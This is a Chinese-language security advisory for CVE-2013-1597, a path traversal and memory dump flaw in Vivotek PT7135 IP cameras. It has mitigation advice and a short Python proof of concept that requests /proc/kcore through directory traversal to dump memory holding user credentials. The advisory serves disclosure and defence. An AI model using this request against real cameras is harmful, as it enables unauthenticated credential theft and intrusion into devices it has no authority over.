发布日期：2013-04-30
更新日期：2013-05-02

受影响系统：

Vivotek PT7135 IP camera 0400a
Vivotek PT7135 IP camera 0300a

描述：

---

BUGTRAQ  ID: 59576
CVE(CAN) ID: CVE-2013-1597

Vivotek是网络视频解决方案提供商。

Vivotek IP网络摄像头存在路径遍历和内存转储漏洞，0300a固件上，未经身份验证的远程攻击者通过内存转储可获取有效的用户凭证。0400a固件上，攻击者必须通过身份验证。

<*来源：Francisco Falcon
        Nahuel Riva
  
  链接：http://seclists.org/fulldisclosure/2013/Apr/252
        http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

import httplib

conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 除非需要，不要将摄像机联网。
* 如果可能，过滤RTSP流（默认端口554）。
* 在HTTP请求中，至少有一个代理过滤 /../../ 、getparam.cgi
* 对 farseer.out 的每个请求，过滤参数 system.ntp 内的字符串。

厂商补丁：

Vivotek
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vivotek.com/web/product/NetworkCameras.aspx

浏览次数：4286
严重程度：0（网友投票）